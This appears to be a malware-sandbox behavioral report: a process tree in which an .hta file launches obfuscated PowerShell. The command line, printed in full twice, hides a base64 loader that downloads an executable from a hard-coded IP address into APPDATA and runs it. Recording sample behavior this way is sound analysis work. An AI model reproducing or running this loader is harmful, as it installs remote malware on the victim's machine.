| ZeroBOX

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\gdfvr.hta
2556
- cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
  2656
  - powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
    2748
    - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"
      2872
      - cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFA20.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFA0F.tmp"
        2920

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents